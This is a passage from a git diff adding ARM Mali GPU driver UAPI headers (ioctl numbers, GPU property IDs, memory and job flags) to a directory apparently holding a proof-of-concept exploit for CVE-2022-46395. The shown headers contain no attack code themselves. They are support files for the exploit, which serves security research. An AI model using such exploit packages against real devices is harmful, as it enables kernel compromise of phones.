+}; + +#define KBASE_IOCTL_TLSTREAM_STATS \ + _IOR(KBASE_IOCTL_TEST_TYPE, 2, struct kbase_ioctl_tlstream_stats) + +#endif /* MALI_UNIT_TEST */ + +/* Customer extension range */ +#define KBASE_IOCTL_EXTRA_TYPE (KBASE_IOCTL_TYPE + 2) + +/* If the integration needs extra ioctl add them there + * like this: + * + * struct my_ioctl_args { + * .... + * } + * + * #define KBASE_IOCTL_MY_IOCTL \ + * _IOWR(KBASE_IOCTL_EXTRA_TYPE, 0, struct my_ioctl_args) + */ + + +/********************************** + * Definitions for GPU properties * + **********************************/ +#define KBASE_GPUPROP_VALUE_SIZE_U8 (0x0) +#define KBASE_GPUPROP_VALUE_SIZE_U16 (0x1) +#define KBASE_GPUPROP_VALUE_SIZE_U32 (0x2) +#define KBASE_GPUPROP_VALUE_SIZE_U64 (0x3) + +#define KBASE_GPUPROP_PRODUCT_ID 1 +#define KBASE_GPUPROP_VERSION_STATUS 2 +#define KBASE_GPUPROP_MINOR_REVISION 3 +#define KBASE_GPUPROP_MAJOR_REVISION 4 +/* 5 previously used for GPU speed */ +#define KBASE_GPUPROP_GPU_FREQ_KHZ_MAX 6 +/* 7 previously used for minimum GPU speed */ +#define KBASE_GPUPROP_LOG2_PROGRAM_COUNTER_SIZE 8 +#define KBASE_GPUPROP_TEXTURE_FEATURES_0 9 +#define KBASE_GPUPROP_TEXTURE_FEATURES_1 10 +#define KBASE_GPUPROP_TEXTURE_FEATURES_2 11 +#define KBASE_GPUPROP_GPU_AVAILABLE_MEMORY_SIZE 12 + +#define KBASE_GPUPROP_L2_LOG2_LINE_SIZE 13 +#define KBASE_GPUPROP_L2_LOG2_CACHE_SIZE 14 +#define KBASE_GPUPROP_L2_NUM_L2_SLICES 15 + +#define KBASE_GPUPROP_TILER_BIN_SIZE_BYTES 16 +#define KBASE_GPUPROP_TILER_MAX_ACTIVE_LEVELS 17 + +#define KBASE_GPUPROP_MAX_THREADS 18 +#define KBASE_GPUPROP_MAX_WORKGROUP_SIZE 19 +#define KBASE_GPUPROP_MAX_BARRIER_SIZE 20 +#define KBASE_GPUPROP_MAX_REGISTERS 21 +#define KBASE_GPUPROP_MAX_TASK_QUEUE 22 +#define KBASE_GPUPROP_MAX_THREAD_GROUP_SPLIT 23 +#define KBASE_GPUPROP_IMPL_TECH 24 + +#define KBASE_GPUPROP_RAW_SHADER_PRESENT 25 +#define KBASE_GPUPROP_RAW_TILER_PRESENT 26 +#define KBASE_GPUPROP_RAW_L2_PRESENT 27 +#define KBASE_GPUPROP_RAW_STACK_PRESENT 28 +#define KBASE_GPUPROP_RAW_L2_FEATURES 29 +#define KBASE_GPUPROP_RAW_CORE_FEATURES 30 +#define KBASE_GPUPROP_RAW_MEM_FEATURES 31 +#define KBASE_GPUPROP_RAW_MMU_FEATURES 32 +#define KBASE_GPUPROP_RAW_AS_PRESENT 33 +#define KBASE_GPUPROP_RAW_JS_PRESENT 34 +#define KBASE_GPUPROP_RAW_JS_FEATURES_0 35 +#define KBASE_GPUPROP_RAW_JS_FEATURES_1 36 +#define KBASE_GPUPROP_RAW_JS_FEATURES_2 37 +#define KBASE_GPUPROP_RAW_JS_FEATURES_3 38 +#define KBASE_GPUPROP_RAW_JS_FEATURES_4 39 +#define KBASE_GPUPROP_RAW_JS_FEATURES_5 40 +#define KBASE_GPUPROP_RAW_JS_FEATURES_6 41 +#define KBASE_GPUPROP_RAW_JS_FEATURES_7 42 +#define KBASE_GPUPROP_RAW_JS_FEATURES_8 43 +#define KBASE_GPUPROP_RAW_JS_FEATURES_9 44 +#define KBASE_GPUPROP_RAW_JS_FEATURES_10 45 +#define KBASE_GPUPROP_RAW_JS_FEATURES_11 46 +#define KBASE_GPUPROP_RAW_JS_FEATURES_12 47 +#define KBASE_GPUPROP_RAW_JS_FEATURES_13 48 +#define KBASE_GPUPROP_RAW_JS_FEATURES_14 49 +#define KBASE_GPUPROP_RAW_JS_FEATURES_15 50 +#define KBASE_GPUPROP_RAW_TILER_FEATURES 51 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_0 52 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_1 53 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_2 54 +#define KBASE_GPUPROP_RAW_GPU_ID 55 +#define KBASE_GPUPROP_RAW_THREAD_MAX_THREADS 56 +#define KBASE_GPUPROP_RAW_THREAD_MAX_WORKGROUP_SIZE 57 +#define KBASE_GPUPROP_RAW_THREAD_MAX_BARRIER_SIZE 58 +#define KBASE_GPUPROP_RAW_THREAD_FEATURES 59 +#define KBASE_GPUPROP_RAW_COHERENCY_MODE 60 + +#define KBASE_GPUPROP_COHERENCY_NUM_GROUPS 61 +#define KBASE_GPUPROP_COHERENCY_NUM_CORE_GROUPS 62 +#define KBASE_GPUPROP_COHERENCY_COHERENCY 63 +#define KBASE_GPUPROP_COHERENCY_GROUP_0 64 +#define KBASE_GPUPROP_COHERENCY_GROUP_1 65 +#define KBASE_GPUPROP_COHERENCY_GROUP_2 66 +#define KBASE_GPUPROP_COHERENCY_GROUP_3 67 +#define KBASE_GPUPROP_COHERENCY_GROUP_4 68 +#define KBASE_GPUPROP_COHERENCY_GROUP_5 69 +#define KBASE_GPUPROP_COHERENCY_GROUP_6 70 +#define KBASE_GPUPROP_COHERENCY_GROUP_7 71 +#define KBASE_GPUPROP_COHERENCY_GROUP_8 72 +#define KBASE_GPUPROP_COHERENCY_GROUP_9 73 +#define KBASE_GPUPROP_COHERENCY_GROUP_10 74 +#define KBASE_GPUPROP_COHERENCY_GROUP_11 75 +#define KBASE_GPUPROP_COHERENCY_GROUP_12 76 +#define KBASE_GPUPROP_COHERENCY_GROUP_13 77 +#define KBASE_GPUPROP_COHERENCY_GROUP_14 78 +#define KBASE_GPUPROP_COHERENCY_GROUP_15 79 + +#define KBASE_GPUPROP_TEXTURE_FEATURES_3 80 +#define KBASE_GPUPROP_RAW_TEXTURE_FEATURES_3 81 + +#define KBASE_GPUPROP_NUM_EXEC_ENGINES 82 + +#define KBASE_GPUPROP_RAW_THREAD_TLS_ALLOC 83 +#define KBASE_GPUPROP_TLS_ALLOC 84 +#define KBASE_GPUPROP_RAW_GPU_FEATURES 85 + +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) + +#endif /* _UAPI_KBASE_JM_IOCTL_H_ */ + diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h new file mode 100644 index 0000000..5edc780 --- /dev/null +++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_base_jm_kernel.h @@ -0,0 +1,1220 @@ +/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */ +/* + * + * (C) COPYRIGHT 2019-2021 ARM Limited. All rights reserved. + * + * This program is free software and is provided to you under the terms of the + * GNU General Public License version 2 as published by the Free Software + * Foundation, and any use by you of this program is subject to the terms + * of such GNU license. + * + * This program is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the + * GNU General Public License for more details. + * + * You should have received a copy of the GNU General Public License + * along with this program; if not, you can access it online at + * http://www.gnu.org/licenses/gpl-2.0.html. + * + */ + +#ifndef _UAPI_BASE_JM_KERNEL_H_ +#define _UAPI_BASE_JM_KERNEL_H_ + +#include + +typedef __u32 base_mem_alloc_flags; +/* Memory allocation, access/hint flags. + * + * See base_mem_alloc_flags. + */ + +/* IN */ +/* Read access CPU side + */ +#define BASE_MEM_PROT_CPU_RD ((base_mem_alloc_flags)1 << 0) + +/* Write access CPU side + */ +#define BASE_MEM_PROT_CPU_WR ((base_mem_alloc_flags)1 << 1) + +/* Read access GPU side + */ +#define BASE_MEM_PROT_GPU_RD ((base_mem_alloc_flags)1 << 2) + +/* Write access GPU side + */ +#define BASE_MEM_PROT_GPU_WR ((base_mem_alloc_flags)1 << 3) + +/* Execute allowed on the GPU side + */ +#define BASE_MEM_PROT_GPU_EX ((base_mem_alloc_flags)1 << 4) + +/* Will be permanently mapped in kernel space. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_PERMANENT_KERNEL_MAPPING ((base_mem_alloc_flags)1 << 5) + +/* The allocation will completely reside within the same 4GB chunk in the GPU + * virtual space. + * Since this flag is primarily required only for the TLS memory which will + * not be used to contain executable code and also not used for Tiler heap, + * it can't be used along with BASE_MEM_PROT_GPU_EX and TILER_ALIGN_TOP flags. + */ +#define BASE_MEM_GPU_VA_SAME_4GB_PAGE ((base_mem_alloc_flags)1 << 6) + +/* Userspace is not allowed to free this memory. + * Flag is only allowed on allocations originating from kbase. + */ +#define BASEP_MEM_NO_USER_FREE ((base_mem_alloc_flags)1 << 7) + +#define BASE_MEM_RESERVED_BIT_8 ((base_mem_alloc_flags)1 << 8) + +/* Grow backing store on GPU Page Fault + */ +#define BASE_MEM_GROW_ON_GPF ((base_mem_alloc_flags)1 << 9) + +/* Page coherence Outer shareable, if available + */ +#define BASE_MEM_COHERENT_SYSTEM ((base_mem_alloc_flags)1 << 10) + +/* Page coherence Inner shareable + */ +#define BASE_MEM_COHERENT_LOCAL ((base_mem_alloc_flags)1 << 11) + +/* IN/OUT */ +/* Should be cached on the CPU, returned if actually cached + */ +#define BASE_MEM_CACHED_CPU ((base_mem_alloc_flags)1 << 12) + +/* IN/OUT */ +/* Must have same VA on both the GPU and the CPU + */ +#define BASE_MEM_SAME_VA ((base_mem_alloc_flags)1 << 13) + +/* OUT */ +/* Must call mmap to acquire a GPU address for the allocation + */ +#define BASE_MEM_NEED_MMAP ((base_mem_alloc_flags)1 << 14) + +/* IN */ +/* Page coherence Outer shareable, required. + */ +#define BASE_MEM_COHERENT_SYSTEM_REQUIRED ((base_mem_alloc_flags)1 << 15) + +/* Protected memory + */ +#define BASE_MEM_PROTECTED ((base_mem_alloc_flags)1 << 16) + +/* Not needed physical memory + */ +#define BASE_MEM_DONT_NEED ((base_mem_alloc_flags)1 << 17) + +/* Must use shared CPU/GPU zone (SAME_VA zone) but doesn't require the + * addresses to be the same + */ +#define BASE_MEM_IMPORT_SHARED ((base_mem_alloc_flags)1 << 18) + +/** + * Bit 19 is reserved. + * + * Do not remove, use the next unreserved bit for new flags + */ +#define BASE_MEM_RESERVED_BIT_19 ((base_mem_alloc_flags)1 << 19) + +/** + * Memory starting from the end of the initial commit is aligned to 'extension' + * pages, where 'extension' must be a power of 2 and no more than + * BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_MEM_TILER_ALIGN_TOP ((base_mem_alloc_flags)1 << 20) + +/* Should be uncached on the GPU, will work only for GPUs using AARCH64 mmu + * mode. Some components within the GPU might only be able to access memory + * that is GPU cacheable. Refer to the specific GPU implementation for more + * details. The 3 shareability flags will be ignored for GPU uncached memory. + * If used while importing USER_BUFFER type memory, then the import will fail + * if the memory is not aligned to GPU and CPU cache line width. + */ +#define BASE_MEM_UNCACHED_GPU ((base_mem_alloc_flags)1 << 21) + +/* + * Bits [22:25] for group_id (0~15). + * + * base_mem_group_id_set() should be used to pack a memory group ID into a + * base_mem_alloc_flags value instead of accessing the bits directly. + * base_mem_group_id_get() should be used to extract the memory group ID from + * a base_mem_alloc_flags value. + */ +#define BASEP_MEM_GROUP_ID_SHIFT 22 +#define BASE_MEM_GROUP_ID_MASK \ + ((base_mem_alloc_flags)0xF << BASEP_MEM_GROUP_ID_SHIFT) + +/* Must do CPU cache maintenance when imported memory is mapped/unmapped + * on GPU. Currently applicable to dma-buf type only. + */ +#define BASE_MEM_IMPORT_SYNC_ON_MAP_UNMAP ((base_mem_alloc_flags)1 << 26) + +/* Use the GPU VA chosen by the kernel client */ +#define BASE_MEM_FLAG_MAP_FIXED ((base_mem_alloc_flags)1 << 27) + +/* OUT */ +/* Kernel side cache sync ops required */ +#define BASE_MEM_KERNEL_SYNC ((base_mem_alloc_flags)1 << 28) + +/* Force trimming of JIT allocations when creating a new allocation */ +#define BASEP_MEM_PERFORM_JIT_TRIM ((base_mem_alloc_flags)1 << 29) + +/* Number of bits used as flags for base memory management + * + * Must be kept in sync with the base_mem_alloc_flags flags + */ +#define BASE_MEM_FLAGS_NR_BITS 30 + +/* A mask of all the flags which are only valid for allocations within kbase, + * and may not be passed from user space. + */ +#define BASEP_MEM_FLAGS_KERNEL_ONLY \ + (BASEP_MEM_PERMANENT_KERNEL_MAPPING | BASEP_MEM_NO_USER_FREE | \ + BASE_MEM_FLAG_MAP_FIXED | BASEP_MEM_PERFORM_JIT_TRIM) + +/* A mask for all output bits, excluding IN/OUT bits. + */ +#define BASE_MEM_FLAGS_OUTPUT_MASK BASE_MEM_NEED_MMAP + +/* A mask for all input bits, including IN/OUT bits. + */ +#define BASE_MEM_FLAGS_INPUT_MASK \ + (((1 << BASE_MEM_FLAGS_NR_BITS) - 1) & ~BASE_MEM_FLAGS_OUTPUT_MASK) + +/* A mask of all currently reserved flags + */ +#define BASE_MEM_FLAGS_RESERVED \ + (BASE_MEM_RESERVED_BIT_8 | BASE_MEM_RESERVED_BIT_19) + +#define BASEP_MEM_INVALID_HANDLE (0ull << 12) +#define BASE_MEM_MMU_DUMP_HANDLE (1ull << 12) +#define BASE_MEM_TRACE_BUFFER_HANDLE (2ull << 12) +#define BASE_MEM_MAP_TRACKING_HANDLE (3ull << 12) +#define BASEP_MEM_WRITE_ALLOC_PAGES_HANDLE (4ull << 12) +/* reserved handles ..-47< for future special handles */ +#define BASE_MEM_COOKIE_BASE (64ul << 12) +#define BASE_MEM_FIRST_FREE_ADDRESS ((BITS_PER_LONG << 12) + \ + BASE_MEM_COOKIE_BASE) + +/* Similar to BASE_MEM_TILER_ALIGN_TOP, memory starting from the end of the + * initial commit is aligned to 'extension' pages, where 'extension' must be a power + * of 2 and no more than BASE_MEM_TILER_ALIGN_TOP_EXTENSION_MAX_PAGES + */ +#define BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP (1 << 0) + +/** + * If set, the heap info address points to a __u32 holding the used size in bytes; + * otherwise it points to a __u64 holding the lowest address of unused memory. + */ +#define BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE (1 << 1) + +/** + * Valid set of just-in-time memory allocation flags + * + * Note: BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE cannot be set if heap_info_gpu_addr + * in %base_jit_alloc_info is 0 (atom with BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE set + * and heap_info_gpu_addr being 0 will be rejected). + */ +#define BASE_JIT_ALLOC_VALID_FLAGS \ + (BASE_JIT_ALLOC_MEM_TILER_ALIGN_TOP | BASE_JIT_ALLOC_HEAP_INFO_IS_SIZE) + +/** + * typedef base_context_create_flags - Flags to pass to ::base_context_init. + * + * Flags can be ORed together to enable multiple things. + * + * These share the same space as BASEP_CONTEXT_FLAG_*, and so must + * not collide with them. + */ +typedef __u32 base_context_create_flags; + +/* No flags set */ +#define BASE_CONTEXT_CREATE_FLAG_NONE ((base_context_create_flags)0) + +/* Base context is embedded in a cctx object (flag used for CINSTR + * software counter macros) + */ +#define BASE_CONTEXT_CCTX_EMBEDDED ((base_context_create_flags)1 << 0) + +/* Base context is a 'System Monitor' context for Hardware counters. + * + * One important side effect of this is that job submission is disabled. + */ +#define BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED \ + ((base_context_create_flags)1 << 1) + +/* Bit-shift used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_SHIFT (3) + +/* Bitmask used to encode a memory group ID in base_context_create_flags + */ +#define BASEP_CONTEXT_MMU_GROUP_ID_MASK \ + ((base_context_create_flags)0xF << BASEP_CONTEXT_MMU_GROUP_ID_SHIFT) + +/* Bitpattern describing the base_context_create_flags that can be + * passed to the kernel + */ +#define BASEP_CONTEXT_CREATE_KERNEL_FLAGS \ + (BASE_CONTEXT_SYSTEM_MONITOR_SUBMIT_DISABLED | \ + BASEP_CONTEXT_MMU_GROUP_ID_MASK) + +/* Bitpattern describing the ::base_context_create_flags that can be + * passed to base_context_init() + */ +#define BASEP_CONTEXT_CREATE_ALLOWED_FLAGS \ + (BASE_CONTEXT_CCTX_EMBEDDED | BASEP_CONTEXT_CREATE_KERNEL_FLAGS) + +/* + * Private flags used on the base context + * + * These start at bit 31, and run down to zero. + * + * They share the same space as base_context_create_flags, and so must + * not collide with them. + */ + +/* Private flag tracking whether job descriptor dumping is disabled */ +#define BASEP_CONTEXT_FLAG_JOB_DUMP_DISABLED \ + ((base_context_create_flags)(1 << 31)) + +/* Enable additional tracepoints for latency measurements (TL_ATOM_READY, + * TL_ATOM_DONE, TL_ATOM_PRIO_CHANGE, TL_ATOM_EVENT_POST) + */ +#define BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS (1 << 0) + +/* Indicate that job dumping is enabled. This could affect certain timers + * to account for the performance impact. + */ +#define BASE_TLSTREAM_JOB_DUMPING_ENABLED (1 << 1) + +#define BASE_TLSTREAM_FLAGS_MASK (BASE_TLSTREAM_ENABLE_LATENCY_TRACEPOINTS | \ + BASE_TLSTREAM_JOB_DUMPING_ENABLED) +/* + * Dependency stuff, keep it private for now. May want to expose it if + * we decide to make the number of semaphores a configurable + * option. + */ +#define BASE_JD_ATOM_COUNT 256 + +/* Maximum number of concurrent render passes. + */ +#define BASE_JD_RP_COUNT (256) + +/* Set/reset values for a software event */ +#define BASE_JD_SOFT_EVENT_SET ((unsigned char)1) +#define BASE_JD_SOFT_EVENT_RESET ((unsigned char)0) + +/** + * struct base_jd_udata - Per-job data + * + * This structure is used to store per-job data, and is completely unused + * by the Base driver. It can be used to store things such as callback + * function pointer, data to handle job completion. It is guaranteed to be + * untouched by the Base driver. + * + * @blob: per-job data array + */ +struct base_jd_udata { + __u64 blob[2]; +}; + +/** + * typedef base_jd_dep_type - Job dependency type. + * + * A flags field will be inserted into the atom structure to specify whether a + * dependency is a data or ordering dependency (by putting it before/after + * 'core_req' in the structure it should be possible to add without changing + * the structure size). + * When the flag is set for a particular dependency to signal that it is an + * ordering only dependency then errors will not be propagated. + */ +typedef __u8 base_jd_dep_type; + +#define BASE_JD_DEP_TYPE_INVALID (0) /**< Invalid dependency */ +#define BASE_JD_DEP_TYPE_DATA (1U << 0) /**< Data dependency */ +#define BASE_JD_DEP_TYPE_ORDER (1U << 1) /**< Order dependency */ + +/** + * typedef base_jd_core_req - Job chain hardware requirements. + * + * A job chain must specify what GPU features it needs to allow the + * driver to schedule the job correctly. By not specifying the + * correct settings can/will cause an early job termination. Multiple + * values can be ORed together to specify multiple requirements. + * Special case is ::BASE_JD_REQ_DEP, which is used to express complex + * dependencies, and that doesn't execute anything on the hardware. + */ +typedef __u32 base_jd_core_req; + +/* Requirements that come from the HW */ + +/* No requirement, dependency only + */ +#define BASE_JD_REQ_DEP ((base_jd_core_req)0) + +/* Requires fragment shaders + */ +#define BASE_JD_REQ_FS ((base_jd_core_req)1 << 0) + +/* Requires compute shaders + * + * This covers any of the following GPU job types: + * - Vertex Shader Job + * - Geometry Shader Job + * - An actual Compute Shader Job + * + * Compare this with BASE_JD_REQ_ONLY_COMPUTE, which specifies that the + * job is specifically just the "Compute Shader" job type, and not the "Vertex + * Shader" nor the "Geometry Shader" job type. + */ +#define BASE_JD_REQ_CS ((base_jd_core_req)1 << 1) + +/* Requires tiling */ +#define BASE_JD_REQ_T ((base_jd_core_req)1 << 2) + +/* Requires cache flushes */ +#define BASE_JD_REQ_CF ((base_jd_core_req)1 << 3) + +/* Requires value writeback */ +#define BASE_JD_REQ_V ((base_jd_core_req)1 << 4) + +/* SW-only requirements - the HW does not expose these as part of the job slot + * capabilities + */ + +/* Requires fragment job with AFBC encoding */ +#define BASE_JD_REQ_FS_AFBC ((base_jd_core_req)1 << 13) + +/* SW-only requirement: coalesce completion events. + * If this bit is set then completion of this atom will not cause an event to + * be sent to userspace, whether successful or not; completion events will be + * deferred until an atom completes which does not have this bit set. + * + * This bit may not be used in combination with BASE_JD_REQ_EXTERNAL_RESOURCES. + */ +#define BASE_JD_REQ_EVENT_COALESCE ((base_jd_core_req)1 << 5) + +/* SW Only requirement: the job chain requires a coherent core group. We don't + * mind which coherent core group is used. + */ +#define BASE_JD_REQ_COHERENT_GROUP ((base_jd_core_req)1 << 6) + +/* SW Only requirement: The performance counters should be enabled only when + * they are needed, to reduce power consumption. + */ +#define BASE_JD_REQ_PERMON ((base_jd_core_req)1 << 7) + +/* SW Only requirement: External resources are referenced by this atom. + * + * This bit may not be used in combination with BASE_JD_REQ_EVENT_COALESCE and + * BASE_JD_REQ_SOFT_EVENT_WAIT. + */ +#define BASE_JD_REQ_EXTERNAL_RESOURCES ((base_jd_core_req)1 << 8) + +/* SW Only requirement: Software defined job. Jobs with this bit set will not be + * submitted to the hardware but will cause some action to happen within the + * driver + */ +#define BASE_JD_REQ_SOFT_JOB ((base_jd_core_req)1 << 9) + +#define BASE_JD_REQ_SOFT_DUMP_CPU_GPU_TIME (BASE_JD_REQ_SOFT_JOB | 0x1) +#define BASE_JD_REQ_SOFT_FENCE_TRIGGER (BASE_JD_REQ_SOFT_JOB | 0x2) +#define BASE_JD_REQ_SOFT_FENCE_WAIT (BASE_JD_REQ_SOFT_JOB | 0x3) + +/* 0x4 RESERVED for now */ + +/* SW only requirement: event wait/trigger job. + * + * - BASE_JD_REQ_SOFT_EVENT_WAIT: this job will block until the event is set. + * - BASE_JD_REQ_SOFT_EVENT_SET: this job sets the event, thus unblocks the + * other waiting jobs. It completes immediately. + * - BASE_JD_REQ_SOFT_EVENT_RESET: this job resets the event, making it + * possible for other jobs to wait upon. It completes immediately. + */ +#define BASE_JD_REQ_SOFT_EVENT_WAIT (BASE_JD_REQ_SOFT_JOB | 0x5) +#define BASE_JD_REQ_SOFT_EVENT_SET (BASE_JD_REQ_SOFT_JOB | 0x6) +#define BASE_JD_REQ_SOFT_EVENT_RESET (BASE_JD_REQ_SOFT_JOB | 0x7) + +#define BASE_JD_REQ_SOFT_DEBUG_COPY (BASE_JD_REQ_SOFT_JOB | 0x8) + +/* SW only requirement: Just In Time allocation + * + * This job requests a single or multiple just-in-time allocations through a + * list of base_jit_alloc_info structure which is passed via the jc element of + * the atom. The number of base_jit_alloc_info structures present in the + * list is passed via the nr_extres element of the atom + * + * It should be noted that the id entry in base_jit_alloc_info must not + * be reused until it has been released via BASE_JD_REQ_SOFT_JIT_FREE. + * + * Should this soft job fail it is expected that a BASE_JD_REQ_SOFT_JIT_FREE + * soft job to free the JIT allocation is still made. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_ALLOC (BASE_JD_REQ_SOFT_JOB | 0x9) + +/* SW only requirement: Just In Time free + * + * This job requests a single or multiple just-in-time allocations created by + * BASE_JD_REQ_SOFT_JIT_ALLOC to be freed. The ID list of the just-in-time + * allocations is passed via the jc element of the atom. + * + * The job will complete immediately. + */ +#define BASE_JD_REQ_SOFT_JIT_FREE (BASE_JD_REQ_SOFT_JOB | 0xa) + +/* SW only requirement: Map external resource + * + * This job requests external resource(s) are mapped once the dependencies + * of the job have been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_MAP (BASE_JD_REQ_SOFT_JOB | 0xb) + +/* SW only requirement: Unmap external resource + * + * This job requests external resource(s) are unmapped once the dependencies + * of the job has been satisfied. The list of external resources are + * passed via the jc element of the atom which is a pointer to a + * base_external_resource_list. + */ +#define BASE_JD_REQ_SOFT_EXT_RES_UNMAP (BASE_JD_REQ_SOFT_JOB | 0xc) + +/* HW Requirement: Requires Compute shaders (but not Vertex or Geometry Shaders) + * + * This indicates that the Job Chain contains GPU jobs of the 'Compute + * Shaders' type. + * + * In contrast to BASE_JD_REQ_CS, this does not indicate that the Job + * Chain contains 'Geometry Shader' or 'Vertex Shader' jobs. + */ +#define BASE_JD_REQ_ONLY_COMPUTE ((base_jd_core_req)1 << 10) + +/* HW Requirement: Use the base_jd_atom::device_nr field to specify a + * particular core group + * + * If both BASE_JD_REQ_COHERENT_GROUP and this flag are set, this flag + * takes priority + * + * This is only guaranteed to work for BASE_JD_REQ_ONLY_COMPUTE atoms. + * + * If the core availability policy is keeping the required core group turned + * off, then the job will fail with a BASE_JD_EVENT_PM_EVENT error code. + */ +#define BASE_JD_REQ_SPECIFIC_COHERENT_GROUP ((base_jd_core_req)1 << 11) + +/* SW Flag: If this bit is set then the successful completion of this atom + * will not cause an event to be sent to userspace + */ +#define BASE_JD_REQ_EVENT_ONLY_ON_FAILURE ((base_jd_core_req)1 << 12) + +/* SW Flag: If this bit is set then completion of this atom will not cause an + * event to be sent to userspace, whether successful or not. + */ +#define BASEP_JD_REQ_EVENT_NEVER ((base_jd_core_req)1 << 14) + +/* SW Flag: Skip GPU cache clean and invalidation before starting a GPU job. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job starts which does not have this bit set or a job completes + * which does not have the BASE_JD_REQ_SKIP_CACHE_END bit set. Do not use + * if the CPU may have written to memory addressed by the job since the last job + * without this bit set was submitted. + */ +#define BASE_JD_REQ_SKIP_CACHE_START ((base_jd_core_req)1 << 15) + +/* SW Flag: Skip GPU cache clean and invalidation after a GPU job completes. + * + * If this bit is set then the GPU's cache will not be cleaned and invalidated + * until a GPU job completes which does not have this bit set or a job starts + * which does not have the BASE_JD_REQ_SKIP_CACHE_START bit set. Do not use + * if the CPU may read from or partially overwrite memory addressed by the job + * before the next job without this bit set completes. + */ +#define BASE_JD_REQ_SKIP_CACHE_END ((base_jd_core_req)1 << 16) + +/* Request the atom be executed on a specific job slot. + * + * When this flag is specified, it takes precedence over any existing job slot + * selection logic. + */ +#define BASE_JD_REQ_JOB_SLOT ((base_jd_core_req)1 << 17) + +/* SW-only requirement: The atom is the start of a renderpass. + * + * If this bit is set then the job chain will be soft-stopped if it causes the + * GPU to write beyond the end of the physical pages backing the tiler heap, and + * committing more memory to the heap would exceed an internal threshold. It may + * be resumed after running one of the job chains attached to an atom with + * BASE_JD_REQ_END_RENDERPASS set and the same renderpass ID. It may be + * resumed multiple times until it completes without memory usage exceeding the + * threshold. + * + * Usually used with BASE_JD_REQ_T. + */ +#define BASE_JD_REQ_START_RENDERPASS ((base_jd_core_req)1 << 18) + +/* SW-only requirement: The atom is the end of a renderpass. + * + * If this bit is set then the atom incorporates the CPU address of a + * base_jd_fragment object instead of the GPU address of a job chain. + * + * Which job chain is run depends upon whether the atom with the same renderpass + * ID and the BASE_JD_REQ_START_RENDERPASS bit set completed normally or + * was soft-stopped when it exceeded an upper threshold for tiler heap memory + * usage. + * + * It also depends upon whether one of the job chains attached to the atom has + * already been run as part of the same renderpass (in which case it would have + * written unresolved multisampled and otherwise-discarded output to temporary + * buffers that need to be read back). The job chain for doing a forced read and + * forced write (from/to temporary buffers) is run as many times as necessary. + * + * Usually used with BASE_JD_REQ_FS. + */ +#define BASE_JD_REQ_END_RENDERPASS ((base_jd_core_req)1 << 19) + +/* SW-only requirement: The atom needs to run on a limited core mask affinity. + * + * If this bit is set then the kbase_context.limited_core_mask will be applied + * to the affinity. + */ +#define BASE_JD_REQ_LIMITED_CORE_MASK ((base_jd_core_req)1 << 20) + +/* These requirement bits are currently unused in base_jd_core_req + */ +#define BASEP_JD_REQ_RESERVED \ + (~(BASE_JD_REQ_ATOM_TYPE | BASE_JD_REQ_EXTERNAL_RESOURCES | \ + BASE_JD_REQ_EVENT_ONLY_ON_FAILURE | BASEP_JD_REQ_EVENT_NEVER | \ + BASE_JD_REQ_EVENT_COALESCE | \ + BASE_JD_REQ_COHERENT_GROUP | BASE_JD_REQ_SPECIFIC_COHERENT_GROUP | \ + BASE_JD_REQ_FS_AFBC | BASE_JD_REQ_PERMON | \ + BASE_JD_REQ_SKIP_CACHE_START | BASE_JD_REQ_SKIP_CACHE_END | \ + BASE_JD_REQ_JOB_SLOT | BASE_JD_REQ_START_RENDERPASS | \ + BASE_JD_REQ_END_RENDERPASS | BASE_JD_REQ_LIMITED_CORE_MASK)) + +/* Mask of all bits in base_jd_core_req that control the type of the atom. + * + * This allows dependency only atoms to have flags set + */ +#define BASE_JD_REQ_ATOM_TYPE \ + (BASE_JD_REQ_FS | BASE_JD_REQ_CS | BASE_JD_REQ_T | BASE_JD_REQ_CF | \ + BASE_JD_REQ_V | BASE_JD_REQ_SOFT_JOB | BASE_JD_REQ_ONLY_COMPUTE) + +/** + * Mask of all bits in base_jd_core_req that control the type of a soft job. + */ +#define BASE_JD_REQ_SOFT_JOB_TYPE (BASE_JD_REQ_SOFT_JOB | 0x1f) + +/* Returns non-zero value if core requirements passed define a soft job or + * a dependency only job. + */ +#define BASE_JD_REQ_SOFT_JOB_OR_DEP(core_req) \ + (((core_req) & BASE_JD_REQ_SOFT_JOB) || \ + ((core_req) & BASE_JD_REQ_ATOM_TYPE) == BASE_JD_REQ_DEP) + +/** + * enum kbase_jd_atom_state + * + * @KBASE_JD_ATOM_STATE_UNUSED: Atom is not used. + * @KBASE_JD_ATOM_STATE_QUEUED: Atom is queued in JD. + * @KBASE_JD_ATOM_STATE_IN_JS: Atom has been given to JS (is runnable/running). + * @KBASE_JD_ATOM_STATE_HW_COMPLETED: Atom has been completed, but not yet + * handed back to job dispatcher for + * dependency resolution. + * @KBASE_JD_ATOM_STATE_COMPLETED: Atom has been completed, but not yet handed + * back to userspace. + */ +enum kbase_jd_atom_state { + KBASE_JD_ATOM_STATE_UNUSED, + KBASE_JD_ATOM_STATE_QUEUED, + KBASE_JD_ATOM_STATE_IN_JS, + KBASE_JD_ATOM_STATE_HW_COMPLETED, + 